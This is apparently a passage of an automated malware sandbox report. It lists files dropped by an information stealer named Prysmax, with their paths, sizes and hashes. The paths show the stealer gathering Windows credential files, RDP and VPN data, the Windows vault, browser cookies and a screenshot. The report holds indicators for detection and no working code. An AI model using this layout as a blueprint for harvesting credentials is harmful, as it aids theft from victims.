                                                                                                                                                      SHA256

                                                                                                                                                      85fa677d5892fe5c794eb9d0e51dd317b8d898e97c49a9a1c4875417c0147556

                                                                                                                                                      SHA512

                                                                                                                                                      71a2c25af532942b5676eb0274ed7dcd75c6a4ce69d3bd9541f162d466abb7be299394111a718774884c3cde8518b11fb926343f93a06853433664065510280c

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413740101\qWR3lUj.exe
                                                                                                                                                      Filesize

                                                                                                                                                      1.9MB

                                                                                                                                                      MD5

                                                                                                                                                      f88e81846f7e7666edb9f04c933fd426

                                                                                                                                                      SHA1

                                                                                                                                                      80dae46a3c2c517b4c1b5d95228b0d5dcfa65359

                                                                                                                                                      SHA256

                                                                                                                                                      c8cb3ae4287b10d16c5557b47a6ad9220f097f5449da1c4e575a8194219806d3

                                                                                                                                                      SHA512

                                                                                                                                                      c86b57f648069d31f2ef3bfddc5cb9f36698e113d52966f4b060c5f0212c5a87331d34ca32f04ea5655d79e8e7e7c17f763ac70b07b0558fb87ff8ef54861c5a

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413750101\p3hx1_003.exe
                                                                                                                                                      Filesize

                                                                                                                                                      1.2MB

                                                                                                                                                      MD5

                                                                                                                                                      a06b6ca8d9a307911573389aee28fc34

                                                                                                                                                      SHA1

                                                                                                                                                      1981c60d68715c6f55b02de840b091000085c056

                                                                                                                                                      SHA256

                                                                                                                                                      cce36fa950470b05beb043a273be6ddc93c55550d1e7ee1472cf807e2c87887c

                                                                                                                                                      SHA512

                                                                                                                                                      3a8fb1466bff7806dddc88764a5f02db18f77a32e2dd4de3168130a7b3c8c552f97f60766805b0050634d5100c190dbf56e1e3340c424f091c6299410c85fc89

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413760101\Rm3cVPI.exe
                                                                                                                                                      Filesize

                                                                                                                                                      354KB

                                                                                                                                                      MD5

                                                                                                                                                      27f0df9e1937b002dbd367826c7cfeaf

                                                                                                                                                      SHA1

                                                                                                                                                      7d66f804665b531746d1a94314b8f78343e3eb4f

                                                                                                                                                      SHA256

                                                                                                                                                      aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                                                                                                                                                      SHA512

                                                                                                                                                      ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                                                      Filesize

                                                                                                                                                      88KB

                                                                                                                                                      MD5

                                                                                                                                                      89ccc29850f1881f860e9fd846865cad

                                                                                                                                                      SHA1

                                                                                                                                                      d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                                                                                                                      SHA256

                                                                                                                                                      4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                                                                                                                      SHA512

                                                                                                                                                      0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2XSAzAmhw.hta
                                                                                                                                                      Filesize

                                                                                                                                                      717B

                                                                                                                                                      MD5

                                                                                                                                                      37d68fa2023c8f6594a23b07c5a60a2a

                                                                                                                                                      SHA1

                                                                                                                                                      a918a9a10e0369996ff1e5a82d58546919d860ad

                                                                                                                                                      SHA256

                                                                                                                                                      636f358ee317398a5ef3e6751bc6e9b02a33fc2af408c6581b8323d56f5d4208

                                                                                                                                                      SHA512

                                                                                                                                                      b81e6ece657dbb55515e065e6252b4a4e3b09df502032d9bf9a0b8e8d269fb2848918f528adf74550348054d4794b9f9e138bef83ba0fa53fa149a30ad7628a7

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5FV7F4ZesReErN44J1e8r\YCL.exe
                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                      MD5

                                                                                                                                                      91f372706c6f741476ee0dac49693596

                                                                                                                                                      SHA1

                                                                                                                                                      8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

                                                                                                                                                      SHA256

                                                                                                                                                      9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

                                                                                                                                                      SHA512

                                                                                                                                                      88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C6F.tmp\C70.tmp\C71.bat
                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      e5ddb7a24424818e3b38821cc50ee6fd

                                                                                                                                                      SHA1

                                                                                                                                                      97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                                                                                                                      SHA256

                                                                                                                                                      4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                                                                                                                      SHA512

                                                                                                                                                      450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Expectations.cab.bat
                                                                                                                                                      Filesize

                                                                                                                                                      25KB

                                                                                                                                                      MD5

                                                                                                                                                      ccc575a89c40d35363d3fde0dc6d2a70

                                                                                                                                                      SHA1

                                                                                                                                                      7c068da9c9bb8c33b36aed898fbd39aa061c4ba4

                                                                                                                                                      SHA256

                                                                                                                                                      c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e

                                                                                                                                                      SHA512

                                                                                                                                                      466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax.zip
                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                      MD5

                                                                                                                                                      441f2ca100b6a86db0a7b13b8c74f442

                                                                                                                                                      SHA1

                                                                                                                                                      67db51cf2496e73582a3197aaa06adc24cfa88b8

                                                                                                                                                      SHA256

                                                                                                                                                      4e36026d085e8ae4968f42e87fff7b7521ac25e85c9d45a0522afc089bb2f410

                                                                                                                                                      SHA512

                                                                                                                                                      78da23dc3eea108cba1d302e3ad686ab25617f9c0514eebc77fdbfc610f474e9010dd462d67843ce83e20df137dfc32e6fb357ea10d6656145c093022b488827

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\CREDHIST
                                                                                                                                                      Filesize

                                                                                                                                                      24B

                                                                                                                                                      MD5

                                                                                                                                                      d5cb04643aa82481541f6c6852372332

                                                                                                                                                      SHA1

                                                                                                                                                      b68ab7f7fb28e4bebc0f538f446d8e8fdab47e69

                                                                                                                                                      SHA256

                                                                                                                                                      06bbdfa0dfedd03b791d88bdbf32949dfe662fafaca014b852ad7c29ab29d6f3

                                                                                                                                                      SHA512

                                                                                                                                                      358a2eb8dd0a715a3b553ef13576247bbab077e76143ff4a1e2939c0b7bdaced54be0f9a9b81003487498133ab145134ce3e0d4a3e722fa12fd61f482bcaa0e2

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-805952410-2104024357-1716932545-1000\7b33c499-5ddd-420e-8254-5f8888bb3e48
                                                                                                                                                      Filesize

                                                                                                                                                      468B

                                                                                                                                                      MD5

                                                                                                                                                      aba6169e5c68b2f5f46ad822f38bffdf

                                                                                                                                                      SHA1

                                                                                                                                                      21951d6842ee64a46ff494ee4ef5b90bfbc75469

                                                                                                                                                      SHA256

                                                                                                                                                      dbb6b830968c654377e693922f0cc8a8aa0b775a486fdeef32ae7fbad941240e

                                                                                                                                                      SHA512

                                                                                                                                                      75934abd959dbab8912a477c2bb84475f252af54dd4a230b47a8915d22be2346ee144e9ed290be7d1061e503db9d15917db1a559886c9e37e5eed72dbf0fcf3b

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-805952410-2104024357-1716932545-1000\Preferred
                                                                                                                                                      Filesize

                                                                                                                                                      24B

                                                                                                                                                      MD5

                                                                                                                                                      30d453511e5f3093ab0e76d57f68d2f1

                                                                                                                                                      SHA1

                                                                                                                                                      a255bce3a1ae84d0a19b89fa072c86dcbf5057cf

                                                                                                                                                      SHA256

                                                                                                                                                      881132ed8b5d73e47eef4f02a9b8e346cf971d2f77f1300c5fa3ad2b6a5880a7

                                                                                                                                                      SHA512

                                                                                                                                                      c1dcf14c7d36c8cf724305b22042e92b4eea400a5ef24796fe58f9ede73a2fe43ee410bd8dd7f935050082b5a04d68c6954acec06cb69e783f9c248aa06d43a3

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_2\DFBE70A7E5CC19A398EBF1B96859CE5D
                                                                                                                                                      Filesize

                                                                                                                                                      10KB

                                                                                                                                                      MD5

                                                                                                                                                      d23d7e77f14e36f9d276ad0fba11fa30

                                                                                                                                                      SHA1

                                                                                                                                                      fcdaea576664c5a1ea278abcd1ce044b8c253929

                                                                                                                                                      SHA256

                                                                                                                                                      123727096aa596235256f03c26f982732128919db33590ffbbaf20b2274f85f3

                                                                                                                                                      SHA512

                                                                                                                                                      c2dd8d94c5fa89cb632e80bdea44be18941b28f5fba2ac17c4c9eee82b447a517584814021337ebf8b45b5dc36e518a7343a46eabb3fee68de075bc3ebd42be4

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\RDP_Sessions.txt
                                                                                                                                                      Filesize

                                                                                                                                                      499B

                                                                                                                                                      MD5

                                                                                                                                                      13ad7335611fcfb88efa3590a11f2212

                                                                                                                                                      SHA1

                                                                                                                                                      ae8de55bb91229e0e3e082697c2ffa877340c437

                                                                                                                                                      SHA256

                                                                                                                                                      1f93e1567b7b8ddcf5db5ea670eecf1ce717ce72346bb28c131be218f25bf8ed

                                                                                                                                                      SHA512

                                                                                                                                                      14e5393c6ad833c222d9f883006891190ce5811d484be079b820beb10fda99a8b0ec9c2470a091c8f0b118f5319b5425517849a50e72ed3c753beeba0132dc82

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\cmdkey_list.txt
                                                                                                                                                      Filesize

                                                                                                                                                      310B

                                                                                                                                                      MD5

                                                                                                                                                      edec56a80c3d3041893a60a3c0014920

                                                                                                                                                      SHA1

                                                                                                                                                      1c39d08dc47841ccda40de04d030c73a91d6c23d

                                                                                                                                                      SHA256

                                                                                                                                                      fd01c5aafd0375542daf80d0fba12fcfc69cf392e276b99ca8bc45b0727a436c

                                                                                                                                                      SHA512

                                                                                                                                                      cd9213040743af060dca56b453cf34ee8703d87923c34e23a2bcb15a8cec2086eaf42324898f82ad5b5cdf3bdd1ce4ed07f48b031fdbe366403c5147b263ef2d

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\windows_vault.txt
                                                                                                                                                      Filesize

                                                                                                                                                      336B

                                                                                                                                                      MD5

                                                                                                                                                      da510ee1496286415109f3ec58d6123c

                                                                                                                                                      SHA1

                                                                                                                                                      8886a1786606d8f5d693a6e87fef39054bd022af

                                                                                                                                                      SHA256

                                                                                                                                                      82c3ed7cb28a633ba026353c6349e8305423e5e1202f8c6030ec1b8706932e73

                                                                                                                                                      SHA512

                                                                                                                                                      f2b5b6e278e6a91e92d0dc296e7837c3d486505a23fe3f574a5c56735a369e30c06942a2695f09a110884d7988b512f02d9a599b82b6abe9bdb3f0e8d8286b77

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\ConnectedDevicesPlatform__connected devices platform certificates.sst
                                                                                                                                                      Filesize

                                                                                                                                                      655B

                                                                                                                                                      MD5

                                                                                                                                                      31dffd78230d2fa1c6d196ee5ee314ab

                                                                                                                                                      SHA1

                                                                                                                                                      2da2095c9c28740d3d18e25d69518ab22a97acbd

                                                                                                                                                      SHA256

                                                                                                                                                      0d351e784b835d2722eeae4939d555da72943e147780f80590e4f53de1b08cd8

                                                                                                                                                      SHA512

                                                                                                                                                      20d184115d7d237cd1cfd21930f2ec39cab95d56ea92c9544cb8c3283e772d638a6e2eeeceada5c9a92b4f9aa18dc6962ddfcfa4b0aef88e7b0e5399f1d2ff41

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Desktop__disconnectreset.dot
                                                                                                                                                      Filesize

                                                                                                                                                      395KB

                                                                                                                                                      MD5

                                                                                                                                                      3fda76ebde44cbe869092d6ac518a5cb

                                                                                                                                                      SHA1

                                                                                                                                                      ae3e4136fd9376cbbff05899cb85bb3a44503ad5

                                                                                                                                                      SHA256

                                                                                                                                                      e28aa1cf667f3d635cd22e88a452a3101a6789e6a751c116d9d1084c53cd2112

                                                                                                                                                      SHA512

                                                                                                                                                      96a70f63541a4fdec4d0a77581eb406f41502a2936057de86489530dd501b27a476e502399734ec7ae5cef3b764fc84e153eb6de126478148e130e5e3cc859e3

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Desktop__unlockdisconnect.eprtx
                                                                                                                                                      Filesize

                                                                                                                                                      261KB

                                                                                                                                                      MD5

                                                                                                                                                      68eb70620e806c879a0bc3f9c7624a00

                                                                                                                                                      SHA1

                                                                                                                                                      ad97d9057f31695d98b85fa666a1b53d209e452a

                                                                                                                                                      SHA256

                                                                                                                                                      bd7cfb7242253024f1f0a66e19c49672e1973f602d505a4212d26f6df2127b95

                                                                                                                                                      SHA512

                                                                                                                                                      bc4cf9516ee49ae2078819afea25e004817fba9c9baf78f0a8de429ee279910f14e37f7820e2437516e1d398a993d56576b46c58cc234afb5fb77f332997308c

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Documents__unprotectdisconnect.docx
                                                                                                                                                      Filesize

                                                                                                                                                      19KB

                                                                                                                                                      MD5

                                                                                                                                                      19eb878ffbe9f92df96156a8356539cd

                                                                                                                                                      SHA1

                                                                                                                                                      af954491a2a102351ac1a322819a2bda56fb31d1

                                                                                                                                                      SHA256

                                                                                                                                                      3f256fb71c2c3b90aeec8167e6c282c86e3dbd7a5f62533dcab2956e61d5bece

                                                                                                                                                      SHA512

                                                                                                                                                      84ad245ad3966f409ee271da19a33ef446bd3be683fc8bb394192bc3ccaa3b6b294dbb7a2d7dc563fb58e7d7197ea4703bf47bdd92161e7551d29ba8fa532c8c

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Downloads__newdisconnect.edrwx
                                                                                                                                                      Filesize

                                                                                                                                                      1.3MB

                                                                                                                                                      MD5

                                                                                                                                                      d80e91ad40de5bba9d3cd1e6cd4e1c71

                                                                                                                                                      SHA1

                                                                                                                                                      f18c6c328a4fbdeff15950e502073171c5c5dd7f

                                                                                                                                                      SHA256

                                                                                                                                                      31976da4dd4c933ca6ca027a8503c654b371e940a6b89e930b4065c524db2edb

                                                                                                                                                      SHA512

                                                                                                                                                      f03dceee413a1857e2a4b5b5100d28d6bc710ec0e6c278a9c0111fb43a3410a126ecbdd75728d65b0144c17002317b33a7fea002b700c20b497276e9df71cd8e

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Music__unprotectconnect.mpeg
                                                                                                                                                      Filesize

                                                                                                                                                      475KB

                                                                                                                                                      MD5

                                                                                                                                                      baac33e8f97ff2ac9d02347a4f944a12

                                                                                                                                                      SHA1

                                                                                                                                                      576dcedeb10effbe5d24346ef1ae56292702c7ac

                                                                                                                                                      SHA256

                                                                                                                                                      84c5a2cdbd3acf14ddd5609ac5b2d4405fdb9274436ce9aea1179861f741005c

                                                                                                                                                      SHA512

                                                                                                                                                      a21a3426c600b72b052334cadbd69fb76e54de64749ad7871c433d8f5a7239925efac33e9584da0644e0870918ecbf9ce08bc9b6d1cc64b12e6499eec5d87ff2

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Roaming__popconnect.mp3
                                                                                                                                                      Filesize

                                                                                                                                                      204KB

                                                                                                                                                      MD5

                                                                                                                                                      a9f765dde809473f217613d2cc4edd95

                                                                                                                                                      SHA1

                                                                                                                                                      787377174363481454cd426e79716382f0f4f44b

                                                                                                                                                      SHA256

                                                                                                                                                      30f75e924704b499d8eeb85125c735b69d131df8ca1ad7e7a121e95e1e06875c

                                                                                                                                                      SHA512

                                                                                                                                                      5166949bd56701a43b503fa7388f7d9d561b79199dc54c1fb7eae719c4c4cc922eea3ed12bf61a127cb4ff5af92477f7ee8d7bc144aac0954cb32f602160a929

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Searches__winrt--{s-1-5-21-805952410-2104024357-1716932545-1000}-.searchconnector-ms
                                                                                                                                                      Filesize

                                                                                                                                                      855B

                                                                                                                                                      MD5

                                                                                                                                                      0fc52690756e86303e67bae4a5d98b97

                                                                                                                                                      SHA1

                                                                                                                                                      cb225a9642b42b554b65b4d3bf6411ab874d940a

                                                                                                                                                      SHA256

                                                                                                                                                      b8a5c63e88d4b867d2d5fd862e953f144eebabe03b86aedfe7391a40be0e5e06

                                                                                                                                                      SHA512

                                                                                                                                                      6bc41aadec2f88886b7d77b9f1f1476fa0130788f9b81c6048a4352007878e524e0f2e1bc8eef2036be407607f0025c939b22aaa699fa955151a359c8b169e5a

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\WindowsVPN\windows_vpn_connections.txt
                                                                                                                                                      Filesize

                                                                                                                                                      862B

                                                                                                                                                      MD5

                                                                                                                                                      ac9b930e233d016346ff67d6a3f5a9e6

                                                                                                                                                      SHA1

                                                                                                                                                      fcf0e44ae5b569708eeef45826e2f46e611a8eee

                                                                                                                                                      SHA256

                                                                                                                                                      7fb38f1012513704aae95eb7f8cd64c3413f1e64609aa0ec59faa7698330487c

                                                                                                                                                      SHA512

                                                                                                                                                      7188664b63c0538f184225846df1e4ed50f724a9f1fd87c93b341fa107b705b2459afb1632f5e0205938ea0a6535d86e59a440c042e76bf616b3c230113b03d3

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Certificates\personal_certs.txt
                                                                                                                                                      Filesize

                                                                                                                                                      65B

                                                                                                                                                      MD5

                                                                                                                                                      8314c362164d829cb812467c333662a0

                                                                                                                                                      SHA1

                                                                                                                                                      3ae5f774269aaa4fdeaf4e5eb78b7a6f7625ab97

                                                                                                                                                      SHA256

                                                                                                                                                      354644ecf4d6b3ac97c0187d8581bb82cdb8caf8e438755b998c5df0f7fd85ac

                                                                                                                                                      SHA512

                                                                                                                                                      7b32320a2bc82f69a7470168d4515d1fbe1f44ed03f4f30330870732e6c7eec771104bc59a1f9486f4e82e869e1f2b9d84507a976ca5fcd511fdf9e5e1f2b3e8

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Cookies\Prysmax_Cookies_chrome_Default.txt
                                                                                                                                                      Filesize

                                                                                                                                                      304B

                                                                                                                                                      MD5

                                                                                                                                                      985ef0cd06af2e099075e014618532fa

                                                                                                                                                      SHA1

                                                                                                                                                      812db9dd61f34cd55ddada7ff5f81182dab8dc4e

                                                                                                                                                      SHA256

                                                                                                                                                      bc3d7a7abf71b9646cdec372bba050660260e46f4a6d6df00864d6c555420f72

                                                                                                                                                      SHA512

                                                                                                                                                      d64d22d37e7fd4bc24b4d5d8ec9067e861311b68e61d7066979e928d2b2ca9c0bebbb9119b6bfd1aad21f0f86a1688999178bc4b9e12c242cc43d68c545ab744

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\Cookies\extraction_log_20250402_023956.txt
                                                                                                                                                      Filesize

                                                                                                                                                      9KB

                                                                                                                                                      MD5

                                                                                                                                                      eaa5564d0dd36e34b44dc56671b1461b

                                                                                                                                                      SHA1

                                                                                                                                                      ae3b4870a51894527f794b2be0bd72308abce57a

                                                                                                                                                      SHA256

                                                                                                                                                      68cba42d9f6ca2fca6991d2fa4c368d1ed1ab8c1f36eede12484e3cc28ac6122

                                                                                                                                                      SHA512

                                                                                                                                                      f74ec8b8005d27264ba90ac3a47c1793d2869fe11779f75b03bcc4e77df97faad05bf051b78fd0e88855151e517db5e2052442b1d7015750f6f74d7f6abe9abb

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Prysmax\screenshot_20250402_023949.bmp
                                                                                                                                                      Filesize

                                                                                                                                                      3.5MB

                                                                                                                                                      MD5

                                                                                                                                                      0fcbef503002892c3fed2914c2948bcb

                                                                                                                                                      SHA1

                                                                                                                                                      edd1de423d2231460f111c041333ea16ab91f0f2

                                                                                                                                                      SHA256

                                                                                                                                                      e5bb4cce7cd2fbddbb7c0f25ea118a81cdf22f07f6da4e351469adf8e7f9c837

                                                                                                                                                      SHA512

                                                                                                                                                      815a471f2ba0ab05d9d2b3e625f696d03a4cc29e90763d454d8000bff99f3fc021091933c0a9c08b073564e91d8aec81e1a9cabb381fab199b55bb8ff640c88c

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cysnubja.shk.ps1
                                                                                                                                                      Filesize

                                                                                                                                                      60B

                                                                                                                                                      MD5

                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                      SHA1

                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                      SHA256

                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                      SHA512

                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ff_bookmarks_tmp_1777288123.db
                                                                                                                                                      Filesize

                                                                                                                                                      5.0MB

                                                                                                                                                      MD5

                                                                                                                                                      9fa80950644c0194e18516fe0b814161

                                                                                                                                                      SHA1

                                                                                                                                                      da8bdcc86d213679f7dbd7b99d6b1526c84b1211

                                                                                                                                                      SHA256

                                                                                                                                                      283a47d08ecc3e2785f2ffd87a2d6ae317fbf9ae6309b612641c6a12957fc0a5

                                                                                                                                                      SHA512

                                                                                                                                                      adeda188e5a9661ebeac450aa27e70141e3c4a1d68eb0393e6605cc618c75a26f861c25f74f208d77c8388014c8c268d4f6707efbe78dfcf65e30643c6ab712d

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ssisd.sys
                                                                                                                                                      Filesize

                                                                                                                                                      15KB

                                                                                                                                                      MD5

                                                                                                                                                      b69f744f56196978a2f9493f7dcb6765

                                                                                                                                                      SHA1

                                                                                                                                                      3c9400e235de764a605485a653c747883c00879b

                                                                                                                                                      SHA256

                                                                                                                                                      38907d224ac0df6ddb5eb115998cc0be9ffdae237f9b61c39ddaeda812d5160d

                                                                                                                                                      SHA512

                                                                                                                                                      6685a618f1196e66fe9220b218a70974335cdbf45abf9c194e89f0b1836234871eb27cbf21c3fcaa36ae52d38b5de7a95d13d2ec7c8f71037d0f37135ddcbaf5

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                      Filesize

                                                                                                                                                      2.9MB

                                                                                                                                                      MD5

                                                                                                                                                      b826dd92d78ea2526e465a34324ebeea

                                                                                                                                                      SHA1

                                                                                                                                                      bf8a0093acfd2eb93c102e1a5745fb080575372e

                                                                                                                                                      SHA256

                                                                                                                                                      7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

                                                                                                                                                      SHA512

                                                                                                                                                      1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\AlternateServices.bin
                                                                                                                                                      Filesize

                                                                                                                                                      10KB

                                                                                                                                                      MD5

                                                                                                                                                      58f4426327cc772a079684be3bf927ff

                                                                                                                                                      SHA1

                                                                                                                                                      57dceb6b27b2f12b07c7518faaeaf02d66fbcb4a

                                                                                                                                                      SHA256

                                                                                                                                                      51f6d59937b01e799d183190aee40dbdacebefa1c764ee878ce7040e1c48e3b9

                                                                                                                                                      SHA512

                                                                                                                                                      d10b6bc2dce28c5fc35bf03318698ad62f92c92b8859097527f91846530728752ac36b15c0c6065b6b45875bde0224e509ff5867ee4ea99bbb70546c32f9ef91

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\db\data.safe.tmp
                                                                                                                                                      Filesize

                                                                                                                                                      27KB

                                                                                                                                                      MD5

                                                                                                                                                      e3e235967512caf84c2c5f0fcbba92c3

                                                                                                                                                      SHA1

                                                                                                                                                      edf2f42269eb66fb592db752d0e5697e0a769242

                                                                                                                                                      SHA256

                                                                                                                                                      86913503ebc77b4209665f56387251fb9e6eb2b26f130b12b1363fdaab7399db

                                                                                                                                                      SHA512

                                                                                                                                                      c9be937e47bdaf9ddb00b5b6119879a94a3f95f6f2ba4167b5636ab277917f53102a61c250417587a7538d72b57c7f57aea4adc518dfaf6e8e325739a9273f94

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\db\data.safe.tmp
                                                                                                                                                      Filesize

                                                                                                                                                      28KB

                                                                                                                                                      MD5

                                                                                                                                                      efaa4d0b898ef68f6d2bebfcae23bff5

                                                                                                                                                      SHA1

                                                                                                                                                      c4c6a0a551598deff37b9abad1d4e94aa0c1d1e9

                                                                                                                                                      SHA256

                                                                                                                                                      ac223150f20de1088e9ad6cfdb2584488c9e103e3a3c65f761b6b23b44a412ed

                                                                                                                                                      SHA512

                                                                                                                                                      49d7bfe93a9dcf7aedd61600cdb2b1127eeddf2a9e3673f1eaca9787eb298f819f2002bfd61abc1045ac4fc73b25e3eb79b62b42f92f41d42479335a2457170e

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\db\data.safe.tmp
                                                                                                                                                      Filesize

                                                                                                                                                      27KB

                                                                                                                                                      MD5

                                                                                                                                                      002ea736d63ca5ee0bf4018529b8c289

                                                                                                                                                      SHA1

                                                                                                                                                      2b91c78cd11e2dfd1e27643485463c68d2f80b81

                                                                                                                                                      SHA256

                                                                                                                                                      a8da0c27613dc4afd1637e226c22382ef6700d99854246a3bf1a3267d65c014b

                                                                                                                                                      SHA512

                                                                                                                                                      9fe6956422f2911e59a3e82685a8b740a202d42028131582fb7dcea2bb5aa3c73d79d0dc6a4254344cb0ce930872ad6080f5c1b0dce6eaa1c8b258506481ff7b

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\events\events
                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      e645edc3ce34452e4996b55a42810a07

                                                                                                                                                      SHA1

                                                                                                                                                      40665741c68ffe54477a48862511609dfdb92dfc

                                                                                                                                                      SHA256

                                                                                                                                                      cbedccafc92f50c7d03a5352df7b5731de12812f983a486a105c5fcdfb326328

                                                                                                                                                      SHA512

                                                                                                                                                      697e18c5330a17e2a091acea7b88aa3c24c3b83a1485d48ba6bd779dd8353de1fe7668dd2f2d905aac68b3f110d2e4264687c9ded3652d6078c3119e57f90faf

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\clr2s0gc.default-release\datareporting\glean\pending_pings\0a4f5939-af47-459f-b93e-df954c5e89b1
                                                                                                                                                      Filesize

                                                                                                                                                      871B

                                                                                                                                                      MD5

                                                                                                                                                      683741137dc9c359de89eeb375738f42

                                                                                                                                                      SHA1

                                                                                                                                                      89707bfe77a78a6a61986e5ff1e78162194fefed

                                                                                                                                                      SHA256

